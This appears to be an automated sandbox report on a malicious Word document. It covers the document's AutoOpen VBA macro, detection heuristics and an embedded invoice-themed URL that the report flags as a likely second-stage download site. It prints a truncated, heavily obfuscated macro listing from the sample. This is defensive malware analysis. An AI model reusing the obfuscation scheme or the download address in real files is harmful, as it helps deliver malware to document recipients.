MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen macro, a common technique for running code as soon as the document is opened. The script calls CreateObject, which indicates that it instantiates COM objects at run time; the preview below is truncated, so the specific object being created is not visible in this report. A URL was extracted from the document body text (the EMBEDDED_URL finding labels its channel as "In document text (OLE body)", not the macro source) and likely serves as the download location for a second-stage payload.
Heuristics 6
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
AutoOpen macro — high — OLE_VBA_AUTOOPEN: AutoOpen macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, or documents whose source extraction failed, where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- URL http://my-dhl-invoice.top/text.png — In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body) (an Office Open XML schema namespace URI, routinely present in Office documents)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 87971 bytes |

SHA-256: c9d2cd006faf0e9af2ffb44d3f86b65b65b21c7df3aa253476fcd6dab2558cd8
Preview script — first 1,000 lines of the extracted script
' Module attribute header of the decoded VBA dump (macros.bas, see the
' Extracted artifacts table). These lines are VBA module metadata, not
' executable statements.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' A second VB_Name header follows in the same listing: presumably the
' extractor concatenated the document module (ThisDocument) and a standard
' module named m7D5mj into one file — confirm against the raw olevba output.
' The function body that starts below this header is cut off by the
' report's 1,000-line preview limit (see the "(truncated)" marker).
Attribute VB_Name = "m7D5mj"
Public Function CsFGLV8BaMDQUwy(ByRef OHsYnpM441ZgFB As String, ByRef THREE As String) As String
Dim GNvxUQppp0zKOvx() As Byte
If Application.UserName = "LaM7U3jaowj" Then
MsgBox ("Pp75VBldk7Q")
Else
Dim e5gNKrWDTWi7mX As Integer
End If
If Application.UserName = "uTQZASLC81c" Then
MsgBox ("AWc4Aw1pCis")
Else
Dim UvxzACzgHuiuFc As Integer
End If
Dim uAK9cNPvpWjXX1dQff() As Byte
Dim UXH2EJAtwWm2UV, KsEKIepTKra As Integer
UXH2EJAtwWm2UV = 8
KsEKIepTKra = 4
#If SLMY0QdcHJD <> 0 Then
SLMY0QdcHJD = SLMY0QdcHJD + 9
Dim ucycqbmeofd As Variant
Else
Dim ucycqbmeofd As Object
#End If
If UXH2EJAtwWm2UV > KsEKIepTKra Then
For LAqv7dK1EMabs7 = KsEKIepTKra To UXH2EJAtwWm2UV
KsEKIepTKra = KsEKIepTKra / UXH2EJAtwWm2UV
Next LAqv7dK1EMabs7
End If
If Chr(Tan(CDbl(1.55829697777553))) = P Then
Dim qlWqyNqpD528Ms As String
Dim ET9RPE0dBGe As String
ET9RPE0dBGe = tGrYeEQB12K
qlWqyNqpD528Ms = ezVoXgXfx9l
End If
If (StrComp(qlWqyNqpD528Ms, ET9RPE0dBGe, vbTextCompare) <> 0) Then
MsgBox ("gxzKI7HSUjQL6G")
End If
Dim akrXpTG47L8No6, JK0KWkL8zDo As Integer
akrXpTG47L8No6 = 1
JK0KWkL8zDo = 4
#If oHDfqHFdgKV <> 0 Then
oHDfqHFdgKV = oHDfqHFdgKV + 3
Dim q9EmXqWVWsF As Variant
Else
Dim q9EmXqWVWsF As Object
#End If
If akrXpTG47L8No6 > JK0KWkL8zDo Then
For zFYtjjYShznt3L = JK0KWkL8zDo To akrXpTG47L8No6
JK0KWkL8zDo = JK0KWkL8zDo / akrXpTG47L8No6
Next zFYtjjYShznt3L
End If
Dim LniKPKbUSFRd87N As String
LniKPKbUSFRd87N = Application.UserName
Dim NB2cxMz5V6zMCERUf, NAvvHTDF8xQggUkYLs0 As Integer
NAvvHTDF8xQggUkYLs0 = Len(LniKPKbUSFRd87N)
Dim Sp3IQLm6S2MgKN7t As Collection
While NAvvHTDF8xQggUkYLs0 > 2
NB2cxMz5V6zMCERUf = NB2cxMz5V6zMCERUf + 6
NAvvHTDF8xQggUkYLs0 = NAvvHTDF8xQggUkYLs0 - 1
Wend
Dim k8GqHzht15XKZz As Object
Dim rSdPTFT4cSXG7LG As String
rSdPTFT4cSXG7LG = Application.UserName
Dim tkX2U5iOTuW7YtHHM, JVKKGxc14KOohJkTo52 As Integer
JVKKGxc14KOohJkTo52 = Len(rSdPTFT4cSXG7LG)
Dim zHtO8ZJNzw84oydm As Collection
While JVKKGxc14KOohJkTo52 > 9
tkX2U5iOTuW7YtHHM = tkX2U5iOTuW7YtHHM + 9
JVKKGxc14KOohJkTo52 = JVKKGxc14KOohJkTo52 - 1
Wend
Dim ARPTL475WaKVtU As Long
Dim H3a5TxkBwYTUHQ, JDsKeIzLlGP As String
H3a5TxkBwYTUHQ = 7
JDsKeIzLlGP = 1
#If H3a5TxkBwYTUHQ > JDsKeIzLlGP Then
Dim NvRZsLTWxpy As Object
#Else
Dim NvRZsLTWxpy As Integer
NvRZsLTWxpy = 7 + 1
Dim G9QJ8zMTw53 As Integer
For QcfPZqFb7RT = G9QJ8zMTw53 To H3a5TxkBwYTUHQ
G9QJ8zMTw53 = G9QJ8zMTw53 + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next QcfPZqFb7RT
#End If
Dim Xx4cwmQXrgyTOG As Integer
Dim jLIHv7lsEkg As String
Xx4cwmQXrgyTOG = 4975
Dim aW6c9A9Vpmd As Integer
jLIHv7lsEkg = Right(CStr(Xx4cwmQXrgyTOG), Chr(Tan(CDbl(1.55039099610836))))
aW6c9A9Vpmd = CInt(jLIHv7lsEkg)
For kmZXr541HZp = aW6c9A9Vpmd To 65
Xx4cwmQXrgyTOG = Xx4cwmQXrgyTOG + 9
Next kmZXr541HZp
Dim IGF3h10cI1QipX, yojeH0kQ3om As Integer
IGF3h10cI1QipX = 2
yojeH0kQ3om = 7
#If tKnrXMVxYR3 <> 0 Then
tKnrXMVxYR3 = tKnrXMVxYR3 + 7
Dim pALfxp9eunq As Variant
Else
Dim pALfxp9eunq As Object
#End If
If IGF3h10cI1QipX > yojeH0kQ3om Then
For wecKwMd23NaQpr = yojeH0kQ3om To IGF3h10cI1QipX
yojeH0kQ3om = yojeH0kQ3om / IGF3h10cI1QipX
Next wecKwMd23NaQpr
End If
Dim oXusYd0zyX9CiG, DwZtml6j3iw As String
oXusYd0zyX9CiG = 9
DwZtml6j3iw = 5
#If oXusYd0zyX9CiG > DwZtml6j3iw Then
Dim s1bCVkZqjCh As Object
#Else
Dim s1bCVkZqjCh As Integer
s1bCVkZqjCh = 9 + 5
Dim iHBJvpvE7iQ As Integer
For VNqCS26TNdL = iHBJvpvE7iQ To oXusYd0zyX9CiG
iHBJvpvE7iQ = iHBJvpvE7iQ + CInt(Chr(Tan(CDbl(1.55039099610836))))
Next VNqCS26TNdL
#End If
Dim wTRXMQVqjtkZGC As Object
If Application.UserName = "Ap3U3nVcOxF" Then
MsgBox ("SwoaT59YsKw")
Else
Dim cx6Qg5jAWnCPMO As Integer
End If
Dim vm4bEVQKttkNXkt As String
vm4bEVQKttkNXkt = Application.UserName
D
... (truncated)